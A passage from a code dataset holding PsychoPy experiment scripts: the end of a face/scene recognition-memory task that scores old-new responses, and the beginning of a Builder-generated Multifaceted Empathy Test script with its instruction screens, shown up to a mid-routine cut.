\"instr\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*instructions* updates\n if t>=0.0 and instructions.status==NOT_STARTED:\n #keep track of start time/frame for later\n instructions.tStart=t#underestimates by a little under one frame\n instructions.frameNStart=frameN#exact frame index\n instructions.setAutoDraw(True)\n \n #*key_start* updates\n if t>=0.0 and key_start.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_start.tStart=t#underestimates by a little under one frame\n key_start.frameNStart=frameN#exact frame index\n key_start.status=STARTED\n #keyboard checking is just starting\n key_start.clock.reset() # now t=0\n event.clearEvents()\n if key_start.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys)>0:#at least one key was pressed\n key_start.keys=theseKeys[-1]#just the last key pressed\n key_start.rt = key_start.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"instr\"\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#re-establish stim order of encoding so we can later determine what was old and new **Note: want to make sure that this randomization code stays consistent with that in the encoding script**\nstimLists=np.loadtxt('conditions3.txt',dtype='str',delimiter='\\t') #loads info from conditions file (which should be a .txt not an .xlsx)\nfaceList=stimLists[:,0]\nsceneList=stimLists[:,1]\nseed(int(expInfo['participant'])+65) #seeds randomization based on participant number\nshuffle(faceList) #shuffles/randomizes list based on above seed\nseed(int(expInfo['participant'])+43) #seeds randomization based on participant number\nshuffle(sceneList)\ntotStimNumOld=120\ntotRunsOld=6\nfaces_old=faceList[0:totStimNumOld] #picks the first 120 from the randomized list of total faces/scenes\nscenes_old=sceneList[0:totStimNumOld]\nrunLength=(totStimNumOld/totRunsOld)\nrun1_faces=faceList[0:runLength]\nrun2_faces=faceList[runLength:(runLength*2)]\nrun3_faces=faceList[(runLength*2):(runLength*3)]\nrun4_faces=faceList[(runLength*3):(runLength*4)]\nrun5_faces=faceList[(runLength*4):(runLength*5)]\nrun6_faces=faceList[(runLength*5):(runLength*6)]\nrun1_scenes=sceneList[0:runLength]\nrun2_scenes=sceneList[runLength:(runLength*2)]\nrun3_scenes=sceneList[(runLength*2):(runLength*3)]\nrun4_scenes=sceneList[(runLength*3):(runLength*4)]\nrun5_scenes=sceneList[(runLength*4):(runLength*5)]\nrun6_scenes=sceneList[(runLength*5):(runLength*6)]\nstimList_ret= np.hstack((faceList,sceneList))\nmyarray = []\nfor i in range(len(stimList_ret)):\n myarray.append({'stims': stimList_ret[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n\n#set up handler to look after randomisation of conditions etc\ntrials=data.TrialHandler(nReps=1, method=u'random', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=(int(expInfo['participant'])+71), name='trials')\nthisExp.addLoop(trials)#add the loop to the experiment\nthisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\nif thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n\nfor thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n image.setImage(stims)\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(key_resp)\n trialComponents.append(text)\n trialComponents.append(image)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*key_resp* updates\n if t>=0.0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1', '2', '3'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #*text* updates\n if t>=0.0 and text.status==NOT_STARTED:\n #keep track of start time/frame for later\n text.tStart=t#underestimates by a little under one frame\n text.frameNStart=frameN#exact frame index\n text.setAutoDraw(True)\n \n #*image* updates\n if t>=0.0 and image.status==NOT_STARTED:\n #keep track of start time/frame for later\n image.tStart=t#underestimates by a little under one frame\n image.frameNStart=frameN#exact frame index\n image.setAutoDraw(True)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n #check responses\n if len(key_resp.keys)==0: #No response was made\n key_resp.keys=None\n #store data for trials (TrialHandler)\n trials.addData('key_resp.keys',key_resp.keys)\n if key_resp.keys != None:#we had a response\n trials.addData('key_resp.rt',key_resp.rt)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'trials'\n# trials.addData('stimOnset',fixOff)\n# datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,thisTrial.faces,thisTrial.scenes,fixOff,trialResponseTime))\n#creating all the variables needed for the log file and writing them to this log file\n if any(stims==faces_old) or any(stims==scenes_old):\n oldornew=1\n else:\n oldornew=0\n if oldornew==1 and key_resp.keys=='1':\n hits=1\n elif oldornew==1 and key_resp.keys=='2':\n hits=1\n else:\n hits=0\n if oldornew==1 and key_resp.keys=='3':\n misses=1\n else:\n misses=0\n if oldornew==0 and key_resp.keys=='1':\n FAs=1\n elif oldornew==0 and key_resp.keys=='2':\n FAs=1\n else:\n FAs=0\n if oldornew==0 and key_resp.keys=='3':\n CRs=1\n else:\n CRs=0\n if hits==1 or CRs==1:\n Acc=1\n else:\n Acc=0\n trials.addData('OldvsNew',oldornew)\n trials.addData('Hit',hits)\n trials.addData('misses',misses)\n trials.addData('FAs',FAs)\n trials.addData('CRs',CRs)\n trials.addData('Acc',Acc)\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,stims,oldornew,key_resp.keys,key_resp.rt,Acc,hits,misses,FAs,CRs))\n\ndatFile.close()\n\n#get names of stimulus parameters\nif trials.trialList in ([], [None], None): params=[]\nelse: params = trials.trialList[0].keys()\n#save data for this loop\ntrials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\ntrials.saveAsExcel(filename+'.xlsx', sheetName='trials',\n stimOut=params,\n dataOut=['n','all_mean','all_std', 'all_raw'])\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6065864562988281,
"alphanum_fraction": 0.6223341822624207,
"avg_line_length": 46.85268020629883,
"blob_id": "00bb5fa7c51b0e86d5dcd03104bab8d18294c044",
"content_id": "03c59d631abdd84976c6ffeea9f7ba6fef5b80b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53595,
"license_type": "no_license",
"max_line_length": 461,
"num_lines": 1120,
"path": "/MET.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.79.01), Fri Mar 28 16:46:47 2014\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division # so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, sound, gui\nfrom psychopy.constants import * # things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os # handy system and path functions\nimport glob\n\n# Store info about the experiment session\nexpName = u'MET_skeleton' # from the Builder filename that created this script\nexpInfo = {'participant':'','group':'pilot', 'session':'001'}\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\nif dlg.OK == False: core.quit() # user pressed cancel\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\nexpInfo['expName'] = expName\n\n# Setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') # if this fails (e.g. permissions) we will get error\nfilename = 'data' + os.path.sep + '%s_%s_%s' %(expInfo['group'], expInfo['participant'], expInfo['session'])\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\n\n# An ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=False,\n dataFileName=filename)\ndatFile=open(filename+'.txt','a')\ndatFile.write('Block\\tTrial\\tImage\\tCondition\\tValence\\tResponse\\tRT\\tAccuracy\\n')\n\n# Start Code - component code to be run before the window creation\n\n# Setup the Window\nwin = visual.Window(size=(1440, 900), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'black', colorSpace=u'rgb')\n# store frame rate of monitor if we can measure it successfully\nexpInfo['frameRate']=win.getActualFrameRate()\nif expInfo['frameRate']!=None:\n frameDur = 1.0/round(expInfo['frameRate'])\nelse:\n frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\n\n# Initialize components for Routine \"instr1\"\ninstr1Clock = core.Clock()\ninstructions1 = visual.TextStim(win=win, ori=0, name='instructions1',\n text=u'In the following test you will see pictures of people in different emotional states. Each picture will be shown twice over the course of the experiment.\\r\\n\\r\\nWe would like you to answer the following two questions for each pictures:\\r\\n\\r\\n1. What emotion is this person feeling?\\r\\n\\r\\n2. How much do you feel what this person is feeling?\\r\\n', font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr2\"\ninstr2Clock = core.Clock()\ninstructions2 = visual.TextStim(win=win, ori=0, name='instructions2',\n text=u'Here is an example of the first type of question:\\r\\n\\r\\nWhat emotion is this person feeling?', font=u'Arial',\n pos=[0, 0.8], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\ninstr2_image = visual.PatchStim(win=win, name='instr2_image',units=u'pix', \n tex=u'instructions_image.jpg', mask=None,\n ori=0, pos=[0, 0], size=[590, 429],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\ninstr2_choices = visual.TextStim(win=win, ori=0, name='instr2_choices',\n text=u'1. proud 2. joyful 3. happy 4. relieved', font=u'Arial',\n pos=[0, -0.75], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-2.0)\n\n# Initialize components for Routine \"instr3\"\ninstr3Clock = core.Clock()\ninstructions3 = visual.TextStim(win=win, ori=0, name='instructions3',\n text=u\"For each picture you will be presented with 4 possible answers. During the task, please press the button that corresponds to the answer that BEST describes the emotion the person is feeling.\\r\\n\\r\\nSometimes multiple answers will apply to one image. You must choose which word is the one that best describes the emotion being displayed.\\r\\n\\r\\nPress 'return' to continue\\r\\n\", font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr4\"\ninstr4Clock = core.Clock()\ninstructions4 = visual.TextStim(win=win, ori=0, name='instructions4',\n text=u'Here is an example of the second type of question:\\r\\n\\r\\nHow much do you feel what this person is feeling?', font=u'Arial',\n pos=[0, 0.8], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\ninstr4_image = visual.PatchStim(win=win, name='instr4_image',units=u'pix', \n tex=u'instructions_image.jpg', mask=None,\n ori=0, pos=[0, 0], size=[590, 429],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\ninstr4_choices = visual.TextStim(win=win, ori=0, name='instr4_choices',\n text=u'1 2 3 4 5 6 7 8 9', font=u'Arial',\n pos=[0, -0.7], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-2.0)\ninstr4_explanation = visual.TextStim(win=win, ori=0, name='instr4_explanation',\n text=u'(not at all) (very much)', font=u'Arial',\n pos=[0, -0.85], height=0.1, wrapWidth=1.8,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-3.0)\n\n# Initialize components for Routine \"instr5\"\ninstr5Clock = core.Clock()\ninstructions5 = visual.TextStim(win=win, ori=0, name='instructions5',\n text=u'During the task, please try to rate how much you feel what the person is feeling (e.g. to what degree you feel sad when looking at a sad person).\\r\\n\\r\\nIf you dont feel what the person is feeling at all, press \"1\". If you strongly feel what the person is feeling, press \"9\". If your feelings lie between the extremes, you should press the button for one of the increments between 1 and 9.\\r\\n\\r\\nPress \\'return\\' to continue.\\r\\n', font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"instr6\"\ninstr6Clock = core.Clock()\ninstructions6 = visual.TextStim(win=win, ori=0, name='instructions6',\n text=u\"During the experiment you will answer the same question for a block of 10 pictures. That question will appear before the block and you will need to hit 'return' to go on. There will be 8 blocks altogether.\\r\\n\\r\\nPlease answer the questions as quickly and as accurately as possible.\\r\\n\\r\\nThe test will start when you press 'return'\\r\\n\", font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"cog_instr\"\ncog_instrClock = core.Clock()\ncog_instructions = visual.TextStim(win=win, ori=0, name='cog_instructions',\n text=u'What emotion is this person feeling?', font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.8,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"cog\"\ncogClock = core.Clock()\ncog_question = visual.TextStim(win=win, ori=0, name='cog_question',\n text=u'What emotion is this person feeling?', font=u'Arial',\n pos=[0, 0.75], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\ncog_image = visual.PatchStim(win=win, name='cog_image',units=u'pix', \n tex='sin', mask=None,\n ori=0, pos=[0, 0], size=[602, 352],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\ncog_choices = visual.TextStim(win=win, ori=0, name='cog_choices',\n text='nonsense', font=u'Arial',\n pos=[0, -0.75], height=0.1, wrapWidth=1.8,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-2.0)\n\n# Initialize components for Routine \"emo_instr\"\nemo_instrClock = core.Clock()\nemo_instructions = visual.TextStim(win=win, ori=0, name='emo_instructions',\n text=u'How much do you feel what this person is feeling?', font=u'Arial',\n pos=[0, 0], height=0.1, wrapWidth=1.8,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n# Initialize components for Routine \"emo\"\nemoClock = core.Clock()\nemo_question = visual.TextStim(win=win, ori=0, name='emo_question',\n text=u'How much do you feel what this person is feeling?', font=u'Arial',\n pos=[0, 0.75], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=0.0)\nemo_image = visual.PatchStim(win=win, name='emo_image',units=u'pix', \n tex='sin', mask=None,\n ori=0, pos=[0, 0], size=[602, 352],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\nemo_choices = visual.TextStim(win=win, ori=0, name='emo_choices',\n text=u'1 2 3 4 5 6 7 8 9', font=u'Arial',\n pos=[0, -0.7], height=0.1, wrapWidth=1.5,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-2.0)\nemo_explanation = visual.TextStim(win=win, ori=0, name='emo_explanation',\n text=u'(not at all) (very much)', font=u'Arial',\n pos=[0, -0.85], height=0.1, wrapWidth=1.8,\n color=u'white', colorSpace=u'rgb', opacity=1,\n depth=-4.0)\n\n# Create some handy timers\nglobalClock = core.Clock() # to track the time since experiment started\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine \"instr1\"-------\nt = 0\ninstr1Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr1 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr1.status = NOT_STARTED\n# keep track of which components have finished\ninstr1Components = []\ninstr1Components.append(instructions1)\ninstr1Components.append(key_resp_instr1)\nfor thisComponent in instr1Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr1\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr1Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions1* updates\n if t >= 0.0 and instructions1.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions1.tStart = t # underestimates by a little under one frame\n instructions1.frameNStart = frameN # exact frame index\n instructions1.setAutoDraw(True)\n \n # *key_resp_instr1* updates\n if t >= 0.0 and key_resp_instr1.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr1.tStart = t # underestimates by a little under one frame\n key_resp_instr1.frameNStart = frameN # exact frame index\n key_resp_instr1.status = STARTED\n # keyboard checking is just starting\n key_resp_instr1.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr1.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr1.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr1.rt = key_resp_instr1.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr1Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr1\"-------\nfor thisComponent in instr1Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr2\"-------\nt = 0\ninstr2Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr2 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr2.status = NOT_STARTED\n# keep track of which components have finished\ninstr2Components = []\ninstr2Components.append(instructions2)\ninstr2Components.append(instr2_image)\ninstr2Components.append(instr2_choices)\ninstr2Components.append(key_resp_instr2)\nfor thisComponent in instr2Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr2\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr2Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions2* updates\n if t >= 0.0 and instructions2.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions2.tStart = t # underestimates by a little under one frame\n instructions2.frameNStart = frameN # exact frame index\n instructions2.setAutoDraw(True)\n \n # *instr2_image* updates\n if t >= 0.0 and instr2_image.status == NOT_STARTED:\n # keep track of start time/frame for later\n instr2_image.tStart = t # underestimates by a little under one frame\n instr2_image.frameNStart = frameN # exact frame index\n instr2_image.setAutoDraw(True)\n \n # *instr2_choices* updates\n if t >= 0.0 and instr2_choices.status == NOT_STARTED:\n # keep track of start time/frame for later\n instr2_choices.tStart = t # underestimates by a little under one frame\n instr2_choices.frameNStart = frameN # exact frame index\n instr2_choices.setAutoDraw(True)\n \n # *key_resp_instr2* updates\n if t >= 0.0 and key_resp_instr2.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr2.tStart = t # underestimates by a little under one frame\n key_resp_instr2.frameNStart = frameN # exact frame index\n key_resp_instr2.status = STARTED\n # keyboard checking is just starting\n key_resp_instr2.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr2.status == STARTED:\n theseKeys = event.getKeys(keyList=['return', '1', '2', '3', '4'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr2.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr2.rt = key_resp_instr2.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr2Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr2\"-------\nfor thisComponent in instr2Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr3\"-------\nt = 0\ninstr3Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr3 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr3.status = NOT_STARTED\n# keep track of which components have finished\ninstr3Components = []\ninstr3Components.append(instructions3)\ninstr3Components.append(key_resp_instr3)\nfor thisComponent in instr3Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr3\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr3Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions3* updates\n if t >= 0.0 and instructions3.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions3.tStart = t # underestimates by a little under one frame\n instructions3.frameNStart = frameN # exact frame index\n instructions3.setAutoDraw(True)\n \n # *key_resp_instr3* updates\n if t >= 0.0 and key_resp_instr3.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr3.tStart = t # underestimates by a little under one frame\n key_resp_instr3.frameNStart = frameN # exact frame index\n key_resp_instr3.status = STARTED\n # keyboard checking is just starting\n key_resp_instr3.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr3.status == STARTED:\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr3.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr3.rt = key_resp_instr3.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr3Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr3\"-------\nfor thisComponent in instr3Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr4\"-------\nt = 0\ninstr4Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr4 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr4.status = NOT_STARTED\n# keep track of which components have finished\ninstr4Components = []\ninstr4Components.append(instructions4)\ninstr4Components.append(instr4_image)\ninstr4Components.append(instr4_choices)\ninstr4Components.append(instr4_explanation)\ninstr4Components.append(key_resp_instr4)\nfor thisComponent in instr4Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr4\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr4Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions4* updates\n if t >= 0.0 and instructions4.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions4.tStart = t # underestimates by a little under one frame\n instructions4.frameNStart = frameN # exact frame index\n instructions4.setAutoDraw(True)\n \n # *instr4_image* updates\n if t >= 0.0 and instr4_image.status == NOT_STARTED:\n # keep track of start time/frame for later\n instr4_image.tStart = t # underestimates by a little under one frame\n instr4_image.frameNStart = frameN # exact frame index\n instr4_image.setAutoDraw(True)\n \n # *instr4_choices* updates\n if t >= 0.0 and instr4_choices.status == NOT_STARTED:\n # keep track of start time/frame for later\n instr4_choices.tStart = t # underestimates by a little under one frame\n instr4_choices.frameNStart = frameN # exact frame index\n instr4_choices.setAutoDraw(True)\n \n # *instr4_explanation* updates\n if t >= 0.0 and instr4_explanation.status == NOT_STARTED:\n # keep track of start time/frame for later\n instr4_explanation.tStart = t # underestimates by a little under one frame\n instr4_explanation.frameNStart = frameN # exact frame index\n instr4_explanation.setAutoDraw(True)\n \n # *key_resp_instr4* updates\n if t >= 0.0 and key_resp_instr4.status == NOT_STARTED:\n # keep track of start time/frame for later\n key_resp_instr4.tStart = t # underestimates by a little under one frame\n key_resp_instr4.frameNStart = frameN # exact frame index\n key_resp_instr4.status = STARTED\n # keyboard checking is just starting\n key_resp_instr4.clock.reset() # now t=0\n event.clearEvents()\n if key_resp_instr4.status == STARTED:\n theseKeys = event.getKeys(keyList=['return', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n if len(theseKeys) > 0: # at least one key was pressed\n key_resp_instr4.keys = theseKeys[-1] # just the last key pressed\n key_resp_instr4.rt = key_resp_instr4.clock.getTime()\n # a response ends the routine\n continueRoutine = False\n \n # check if all components have finished\n if not continueRoutine: # a component has requested a forced-end of Routine\n routineTimer.reset() # if we abort early the non-slip timer needs reset\n break\n continueRoutine = False # will revert to True if at least one component still running\n for thisComponent in instr4Components:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break # at least one component has not yet finished\n \n # check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n # refresh the screen\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\n win.flip()\n else: # this Routine was not non-slip safe so reset non-slip timer\n routineTimer.reset()\n\n#-------Ending Routine \"instr4\"-------\nfor thisComponent in instr4Components:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine \"instr5\"-------\nt = 0\ninstr5Clock.reset() # clock \nframeN = -1\n# update component parameters for each repeat\nkey_resp_instr5 = event.BuilderKeyResponse() # create an object of type KeyResponse\nkey_resp_instr5.status = NOT_STARTED\n# keep track of which components have finished\ninstr5Components = []\ninstr5Components.append(instructions5)\ninstr5Components.append(key_resp_instr5)\nfor thisComponent in instr5Components:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"instr5\"-------\ncontinueRoutine = True\nwhile continueRoutine:\n # get current time\n t = instr5Clock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *instructions5* updates\n if t >= 0.0 and instructions5.status == NOT_STARTED:\n # keep track of start time/frame for later\n instructions5.tStart = t # underestimates by a little under one frame\n instructions5.frameNStart = frameN # exact frame index\n 